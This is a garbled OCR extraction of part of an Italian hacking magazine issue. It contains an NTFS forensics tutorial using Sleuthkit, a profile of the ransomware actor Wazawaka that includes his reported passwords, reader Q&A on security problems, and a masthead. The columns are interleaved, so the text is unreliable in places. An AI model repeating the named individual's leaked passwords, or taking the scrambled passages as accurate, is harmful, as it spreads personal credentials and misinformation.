al file record che si limita a conservare l’indirizzo dei cluster ove l’attributo
riferimento al box Master File
è effettivamente memorizzato;
Table se vi dovesse servire
• $STANDARD_INFORMATION, l’attributo (residente, ovvero interno al file
record) che memorizza le informazioni temporali (come tempi di creazione, un veloce riepilogo sugli
modifica e accesso) e i flag (quelli relativi, ad esempio, ai file di sistema, attributi NTFS). Per poter
read only, nascosti o compressi) di ciascun file e directory del volume; accedere a ciascun flusso
• $FILE_NAME (anch’esso residente), che viene utilizzato per di dati, i tool di Sleuthkit
la memorizzazione di nome e dimensione dei file (quest’ultima distinta
in dimensione reale e dimensione allocata) e per i riferimenti alla richiedono che sia utilizzato
directory di appartenenza. un indice del tipo x-y-z, in cui:

56

figura #9
figura #10
_n
lia
ita
Il comando istat mostra i dati salienti
di un file, individuato mediante l’indice
del relativo file record.
• x coincide con l’indice numerico
del file record (un intero);
@
• y-z è una coppia di interi che
rappresenta il codice numerico
associato all’attributo $DATA.
Per esempio, tornando all’output
di fls in [figura #9], l’indice 64-128- Insomma, grazie ai tool visti sinora file cancellati. Ma questa è un’altra
2 è relativo al file dd.txt, mentre
l’indice 73-128-2 identifica il file
hj.txt. Qualora – come nei casi
citati – il file sia privo di flussi di
dati multipli, è tuttavia possibile
accedervi indicando unicamente
l’indice numerico del file record di
riferimento, proprio come visto
per i tool trattati nelle precedenti
FILESYSTEM
Il comando fls proprio come se ci muovessimo
mostra, con
l’opzione -r, tutti
all’interno del filesystem vero
e proprio, piuttosto che
i file contenuti
nell’immagine.
analizzarne una “semplice”
immagine. Non ci resta che un
ultimo step: poter visualizzare
puntate. Per anche il contenuto del file,
esempio, per operazione che, per quanto possa
ottenere le sembrare strano, non abbiamo
informazioni salienti ancora visto nelle precedenti
sul file hj.txt puntate. È sufficiente invocare
s
interrogando la il comando icat di Sleuthkit:
relativa entry MFT, è
sufficiente eseguire
ew
> icat chiavetta.dd 73
il comando
oppure, in maniera equivalente
> istat
chiavetta.dd 73 > icat chiavetta.dd 73-128-2
in grado di fornire per visualizzare i contenuti del file
una vera e propria hj.txt [figura #11]. In questo caso,
istantanea del file si tratta di contenuti inseriti
[figura #10], direttamente all’interno
che spazia dalla dell’entry MFT del file: l’attributo
directory di $DATA di hj.txt è residente, come
appartenenza abbiamo avuto modo di appurare
(la root directory, grazie al comando istat.
identificata tramite Ma icat è ugualmente efficace
l’indice del relativo anche nel caso in cui il contenuto
file record, che è per del file sia memorizzato nell’area
l’appunto 5) alla dati: se non ci credete, provate
dimensione (appena il comando
31 byte effettivi,
a fronte di 32 allocati), passando > icat chiavetta.dd 64
per lo stato di allocazione (si tratta,
chiaramente, di un file non che fa riferimento al file dd.txt.
cancellato) e i tempi d’accesso. E non finisce qui: icat è in grado
(entro certe condizioni) di
SÌ, MA IL CONTENUTO? visualizzare persino il contenuto di
siamo in grado di ricostruire tutte storia, e richiede un’altra puntata
le informazioni relative a un file, per essere raccontata…
figura #11
Il comando icat visualizza a video i contenuti di un file individuato
mediante l’indice del relativo file record.
57
HACKULTURE

L’ha ck e r fo l l e

s
l a r e
senza a n u
ew
_n
Dietro al nick Wazawaka si cela uno dei più importanti
criminali nell’ambito del ransomware che adesso
sembra essere completamente impazzito
lia

C
on un lavoro di È stato a lungo su Exploit, dove distinto. Ha guadagnato almeno
intelligence fatto da un vendeva attacchi DDoS per 80 500.000 dollari di commissioni per
team di esperti è stato dollari al giorno, attacchi capaci LockBit e un altro programma di
identificato il di buttare giù siti protetti da CDN ransomware che ha contribuito a
ita

cybercriminale che si nascondeva professionali. E poi è entrato scrivere. E assieme a quelli di

dietro al nick “Wazawaka”:
è un criminale russo di prima
grandezza, che ha lavorato alla
creazione di una serie piuttosto
@
dentro database aziendali, ha DarkSide ha fatto andare giù per
tirato giù sistemi di sicurezza sei lunghissimi giorni la Colonial
piuttosto conosciuti, ha compiuto Pipeline, un sistema di oleodotti
vari atti di cybersabotaggio. americano che trasporta benzina

ampia di ransomware. La polvere e carburante per aerei, cosa

digitale non si è ancora posata su
questa indagine ma già emergono
fatti nuovi che non mancheranno
di suscitare polemiche.
IL BROKER DI ACCESSI
Mikhail Pavlovich Matveev,
trent’anni di Abakan, in Russia, è
l’uomo dietro al nick (e a molti altri
nomi usati in Rete) che ha passato
gli ultimi dieci anni partecipando
in maniera molto attiva a vari
gruppi e forum del cybercrimine.
ECCO IL BOSS!
Nel 2020 ha venduto gli accessi per
una multinazionale cinese che vale
10 miliardi di dollari di fatturato:
si poteva entrare e fare tutto.
“Mostrategli chi è il boss” era stata
la sua firma all’operazione. Ma non
è questo l’unico caso in cui si è
Il cybercriminale usa tre password
per tutti i suoi account: “2k3x8x57”,
“2k3X8X57” e “00virtual”
che ha provocato effetti a catena
tra cui scarsità di carburante
e prezzi alle stelle.
UNA TAGLIA IMPORTANTE
Il Dipartimento di Stato è disposto
a pagare 5 milioni di dollari per
avere informazioni su lui e gli altri

58

_n
affiliati di DarkSide. Ma finora
non l’hanno preso e con lo
lia
pseudonimo di “Uhodiransomwar”
fino a poco tempo fa postava
database delle aziende che non
pagavano il riscatto dei dati
bloccati dai suoi ransomware.
ita
LA FOLLIA SENZA FINE
Negli ultimi tempi, però,
il cybercriminale sembra aver
sbroccato. Nel buio della follia
@
dove è precipitato Wazawaka,
dopo aver guidato il programma
di affiliazione per il ransomware
Babuk (poi Orange) e il forum
dark RAMP, ha
cominciato a pubblicare
il codice di un exploit per
una VPN molto usata e strani
selfie in cui mostra di non avere
il dito anulare della mano sinistra.
Si sarebbe tagliato il dito da solo,
dopo aver perso una scommessa
e per gli esperti è la prova
della sua identità.
HACK E FOLLIA
È un marchio di fabbrica
che lo rende
identificabile: l’anulare
sinistro mancante per
una scommessa.
Richieste di riscatto, scatti di
rabbia, risse digitali, minacce
e poi prese in giro, improvvisi
cambi e Gigabyte su Gigabyte
s
di dati riservati finiti nei forum,
alla portata di tutti.
ew
CACCIA AL LADRO
Una taglia da 5 milioni di dollari
può essere vista come un grande
risultato per un criminale
professionista, oppure una
tremenda iattura. Tutti gli amici
si trasformano in potenziali
delatori, e nei forum chi conosce
qualcosa in più, magari qualche
DISTRUGGERE TUTTO E TUTTI particolare sfuggito in una chat
Sarà stata l’avidità o la semplice privata, può essere tentato
cattiveria, ma la scia di attacchi di metterlo a frutto e andare
e le richieste di riscatto milionarie all’incasso. La fuga nella follia
del pirata sono diventate sempre di Wazakawa può essere anche
più numerose nel corso del questo: una fuga dalla normalità
2020-2021. Dal Dipartimento per proteggere una situazione
di Polizia della città di altrimenti critica. Adesso non
Washington al Museo nazionale ci sono notizie di un arresto
russo, passando per decine di imminente e la guerra complica
altre istituzioni e organizzazioni, tutto, ma gli atti criminali del
gli attacchi si sono moltiplicati e cybercriminale rimangono nella
così le identità e gli alias usati da storia del cybercrime, in attesa che
Wazawaka per “parlare”. la giustizia faccia il suo corso.
Perle ai porci
C osa fai quando hai un malloppo che scotta? Cosa fai quando
il proprietario dei dati si rifiuta di pagare il riscatto? Sembra che
Wazawaka abbia adottato il punto di vista più estremo secondo il quale,
quando le organizzazioni tenute in scacco rifiutano di collaborare o pagare,
tutti i dati rubati alla vittima vengono pubblicati sui forum russi della
criminalità informatica affinché tutti possano saccheggiarli, evitando che
possano essere venduti privatamente al miglior offerente. In un thread
dopo l’altro sul forum del crimine XSS, l’alias “Uhodiransomwar” di
Wazawaka ha pubblicato decine di link per il download dei database
con le informazioni delle aziende che si sono rifiutate di negoziare.
59
 N E@ H AC KE RJ O U RN A L .i t
REDAZIO
REPLY
GLOSSARIO
DI BASE
COOKIE STEALER
Gli stealer sono malware
che rubano informazioni
dai browser, in questo caso
i cookie. Appropriandosi dei
dati personali presenti nei
cookie, i pirati informatici
_n
possono assumere
il controllo della sessione
dell’utente e ottenere
informazioni riservate.
PYTHON
lia
Linguaggio di
programmazione di alto
livello, adatto a sviluppare
applicazioni distribuite,
scripting, computazione
ita
numerica e system testing.
Supporta la programmazione
a oggetti ed è adatto
a principianti ed esperti.
DVB-T2
@
Acronimo di Digital Video
Broadcasting Second
Generation Terrestrial,
è lo standard di ultima
generazione per le
trasmissioni sulla
piattaforma del digitale
terrestre televisivo.
2FA
Acronimo di Autenticazione
a due fattori, è un sistema
di riconoscimento che si
basa sull’utilizzo congiunto
di due metodi di
identificazione individuali.
60
Condividi i tuoi dubbi co
a nuove idee e suggeri
vedere sulla rivista: re
ELIMINAZIONE
DEFINITIVA SU ANDROID
Voglio vendere il mio vecchio
ew
smartphone Android, ma non
posso permettermi che chi lo
acquista riesca a recuperare
qualche file. Sono preoccupato
perché ho letto che sui supporti
Flash è facile recuperare i file
cancellati. Voi non riuscite
a consigliarmi un’app che me
li elimini definitivamente? senza chiedermi però un vero
 Santo
In realtà se hai crittografato
il tuo smartphone Android
dalle Impostazioni di sicurezza
e poi lo hai ripristinato alle
impostazioni di fabbrica,
le possibilità di recuperare
qualsiasi file sono praticamente
nulle. Per maggiore sicurezza
puoi comunque scaricare dal Play
Store un’app come Secure delete
dedicata all’eliminazione definitiva
di immagini e filmati.
CI SONO CASCATA ANCORA
Nonostante sappia benissimo
che non bisogna mai cliccare
su link ricevuti per posta
di cui non si conosca con
certezza il mittente, mi sono
fatta ingannare da quella
che pensavo fosse una
comunicazione di DHL, visto
che stavo aspettando un
pacco. Così ho cliccato sul link
n la redazione insieme
rresti
menti su quello che vo
al.it
dazione@hackerjourn
s
ricevuto via email per sapere
dove si trovava il mio pacco
e mi sono accorta subito che
qualcosa non andava visto che
si è aperto Chrome e si sono
installate diverse estensioni.
A distanza di qualche minuto
ho poi ricevuto un messaggio
su Discord in cui mi veniva
comunicato il mio indirizzo IP
e altre informazioni private
e proprio riscatto. A questo
punto mi chiedo se mi
convenga formattare il
sistema per evitare eventuali
altri guai, oppure se può
bastare un controllo accurato
con un buon antivirus.
Lisa
La soluzione migliore
rimane, in questi casi,
quella di formattare reinstallare
il sistema operativo. Se però
i problemi si sono limitati
all’installazione di qualche
estensione per Chrome noi
inizieremmo a ripristinare
completamente il browser per
evitare la presenza di uno stealer
di cookie e soprattutto
attiveremmo (se ancora non ce
l’hai) la funzionalità 2FA, cioè
l’autenticazione a due fattori,
in tutti i tuoi account. Infine
faremmo comunque una
scansione completa del disco
 O R IE IN A N O N IM O
LEGGERE LE ST
Avrei bisogno di sapere se esiste un modo per leggere le storie
di Instagram senza essere registrato e anche se è possibile
scaricare sullo smartphone le stesse storie e magari anche
i commenti. Allo stesso modo vorrei sapere se c’è la possibilità
di aumentare i miei follower senza doverli acquistare.
Lello

Sbirciare, o lurkare come si dice spesso con un inglesismo, i contenuti social

s
in maniera anonima è una richiesta abbastanza comune come dimostrano le
diverse app moddate di Instagram disponibili sul Web. Tra le altre ti consigliamo
GBInsta che potrai scaricare dall’indirizzo https://gbinsta.com/. Per quanto

ew
riguarda la richiesta di aumentare i follower, se non vuoi ridurti a comperarli, ti
suggeriamo di usare metodi social efficaci come seguire e mettere like e commenti
su foto di altri utenti che ricambieranno a loro volta con un follow e soprattutto
inserire diversi hashtag molto popolari e attinenti alla tua foto. Esiste anche un
sito, https://top-hashtags.com/instagram, che mostra gli hashtag più popolari.
_n
a meno... Possibile che non
Per scovare un file torrent senza farci
esista un software in grado di
infestare dallo spam presente nel Web, individuare in autonomia i vari
lia

è possibile utilizzare un software Open torrent senza passare dal Web?

Aldo
Source con motore di ricerca integrato
Prima di tutto ti dobbiamo
utilizzando un antivirus specifico su Internet indicando il modello ricordare che, anche
ita

come Malwarebytes.
HO PERSO IL PIN DEL TV!
Dovendo risintonizzare i canali
del mio televisore LG a seguito
@
del tuo TV, anche se nella maggior
parte dei casi i PIN preimpostati
sono quelli classici: 0000, 1234
o simili. Se non dovessi trovarlo
online ti suggeriamo di resettare
se per uso personale, non è legale
scaricare video e film protetti
da diritto di autore.
Oltretutto il rischio è proprio
quello di arrivare su siti malevoli

dell’entrata in vigore definitiva il televisore, potrebbe esserci e magari di beccarsi qualche

dello standard DVB-T2, mi sono
accorto che il TV richiedeva
un PIN a 4 cifre per svolgere
l’operazione. Il fatto è che io
non ricordo assolutamente di
averlo mai inserito. Ho provato
con le classiche combinazioni
standard ma niente da fare!
Paolo
Se sei sicuro di non avere
modificato il PIN,
ti consigliamo di fare una ricerca
stato un qualche bug di sistema
o più probabilmente un bug
con la tua memoria...
SCOVARE IL TORRENT
Da qualche mese ormai
i classici siti che utilizzavo
per cercare i file torrent di serie
e film funzionano malissimo,
rimandano a spam e pagine
pubblicitarie e tendono
a installarmi in automatico
estensioni di cui farei volentieri
malware. Fortunatamente
esistono diversi software in grado
di cercare autonomamente
i torrent inserendo alcune parole
chiave. Tra i migliori c’è
qBittorrent, https://www.
qbittorrent.org/, Open Source
e multipiattaforma, che integra
un motore di ricerca sviluppato
in Python ben integrato con un
sistema di ricerca simultanea
nei più famosi siti di
indicizzazione di file torrent.

61
 Il prossimo nu mero iug no
g
sa ra‘ in ed icola da l 3
La falla
nelle blocaksocttrharraein
milioni
Un hacker è riuscito
te... ecco come
di dollari in cryptomone

NTFS fore nsics

e quando
Cosa succed

s
cancelliamo un file?

Giovani pirati ew La guida per

diventare...
_n
La storia
del gruppo di pirati
Anonymous
ato
informatici che ha colpito
Il collettivo ha pubblic
per entrare in Rete
lia

i giganti della tecnologia gli strumenti da usare moli assieme!

sotto la guida “senza volto”... scopria
di un minorenne
ita

SERVIZIO QUALITÀ EDICOLANTI E DL Distributore per l’Estero: SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI)
Sonia Lancellotti, Virgilio Cofano, Luca Majocchi: Tel. 02 92432295 Tel. +390266030400 - Fax +390266030269 - [email protected] - www.sodip.it
[email protected] 351 5582739
Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno
ABBONAMENTI E ARRETRATI
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal Copyright: Sprea S.p.A.
@

[email protected] Informativa su diritti e privacy

Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio
utile e non in concorrenza sleale con la distribuzione in edicola.
Arretrati: si acquistano on-line su www.sprea.it/arretrati
La Sprea S.p.A. titolare esclusiva della testata Hacker Journal e di tutti i diritti di pub-
blicazione e di diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e dise-
gni, anche parziale, è vietato. L’Editore si dichiara pienamente disponibile a valutare -
e se del caso regolare - le eventuali spettanze di terzi per la pubblicazione di immagini
di cui non sia stato eventualmente possibile reperire la fonte. Informativa e Consenso

[email protected]
Mensile - prezzo di copertina 3,90 € in materia di trattamento dei dati personali (Codice Privacy d.lgs. 196/03). Nel vigore
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
www.hackerjournal.it - [email protected]

La Divisione Informatica di Sprea edita anche:
WIN MAGAZINE ✦ LINUX PRO ✦ UBUNTU FACILE
MAC MAGAZINE✦ APP JOURNAL ✦IL MIO COMPUTER IDEA
del D.Lgs 196/03 il Titolare del trattamento dei dati personali, ex art. 28 D.Lgs. 196/03,
329 3922420 è Sprea S.p.A. (di seguito anche “Sprea”), con sede legale in Via Torino, 51 Cernusco sul
Naviglio (MI). La stessa La informa che i Suoi dati, eventualmente da Lei trasmessi
FOREIGN RIGHTS alla Sprea, verranno raccolti, trattati e conservati nel rispetto del decreto legislativo
Paolo Cionti: Tel. 02 92432252 -

[email protected]

ora enunciato anche per attività connesse all’azienda. La avvisiamo, inoltre, che i Suoi
Business Unit Manager: Massimiliano Zagaglia
Cover: Luca Patrian
Impaginazione: Andrea Carpani
Hanno collaborato: Antonio Dini, Francesco Pensabene, Maurizio Russo, Noemi
Chierchia, Roberto Premoli, Vincenzo Digilio, Servizi editoriali: Backdoor di Gianmarco Bruni
Sprea S.p.A.
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia
PI 12770820152- Iscrizione camera Commercio 00746350149
dati potranno essere comunicati e/o trattati (sempre nel rispetto della legge), anche
all’estero, da società e/o persone che prestano servizi in favore della Sprea. In ogni
SERVIZI CENTRALIZZATI
momento Lei potrà chiedere la modifica, la correzione e/o la cancellazione dei Suoi
Art director: Silvia Taietti
dati ovvero esercitare tutti i diritti previsti dagli artt. 7 e ss. del D.Lgs. 196/03 mediante
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni,
comunicazione scritta alla Sprea e/o direttamente al personale Incaricato preposto al
Marcella Gavinelli, Luca Patrian trattamento dei dati. La lettura della presente informativa deve intendersi quale pre-
Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali
sa visione dell’Informativa ex art. 13 D.Lgs. 196/03 e l’invio dei Suoi dati personali alla
Amministrazione: Erika Colombo (responsabile), Irene Citino, Désirée Conti, Sprea varrà quale consenso espresso al trattamento dei dati personali secondo quanto
Sara Palestra -

[email protected]

Per informazioni, potete contattarci allo 02 924321
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato),
Giulia Spreafico (Divisione digital), Stefano Pernarella (ADV & PR)
ADVERTISING, SPECIAL PROJECTS & EVENTS
Segreteria: Emanuela Mapelli - Tel. 02 92432244 -
sopra specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A.
Ufficio Legale: Francesca Sigismondi deve intendersi quale espressa autorizzazione alla loro libera utilizzazione da parte di
Sprea S.p.A. Per qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio, alla
Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. pubblicazione gratuita su qualsiasi supporto cartaceo e non, su qualsiasi pubblicazio-
ISSN 1594-5774 ne (anche non della Sprea S.p.A.), in qualsiasi canale di vendita e Paese del mondo.
Direttore responsabile: Luca Sprea

[email protected] Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. - 20090 Segrate Il materiale inviato alla redazione non potrà essere restituito.
hackerjournal.it

s
ew
_n
lia

Il punto di riferimento per chi fa dell’hacking

una filosofia di vita
ita

La crew di Hacker Journal ti aspetta ogni giorno sul suo nuovo sito Web, il ritrovo della sua ricca comunità
hacker. Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali e
un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza.
In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle
pagine della rivista e sul suo sito scoprirai come difenderti e contrattaccare. #HJisBACK
@

Scopri il sito e la comunità di Hacker Journal

Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ
• News: le ultime notizie su cyberintrusioni, furti
di credenziali, bug, malware e altro ancora
• Contest: metti alla prova le tue conoscenze
con i giochi e le sfide della redazione
• Collezione HJ: i vecchi numeri della rivista,
in PDF, da scaricare
• Invia un articolo: ti piace scrivere e hai un’idea
originale per un articolo? Inviacela e la valuteremo!
 PU BBLICITÀ
100% INDIPENDENTE! NO

T utto quello
ch e g l i a l t r i

s
n o n o s a n o d i r t i !

IN QUES T O N U M E R O ew
_n
VULNERABILITÀ | Una reverse shell dai log
lia

Il bug Log4Shell consente a chiunque di prendere il controllo

di una macchina su cui è presente un applicativo Java
ita

SORVEGLIANZA WI-FI | Monitorati e schedati

Seconda e ultima parte del progetto che ci porterà ad avere un tracciatore
di smartphone personalizzabile usando un SoC e un po’ di codice
@

FILESYSTEM | Alla scoperta di NTFS!

Nozioni e strumenti per scoprire come vengono conservati i file
in NTFS, il filesystem tipico dei sistemi Windows

LETTERE | Leggere le storie in anonimo

Le domande dei lettori, le risposte degli esperti della redazione.
Anche online sul nostro sito: https://hackerjournal.it

NUMERO 262 • MENSILE • 3.90 €

P.I. 03-05-2022 - Maggio

Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50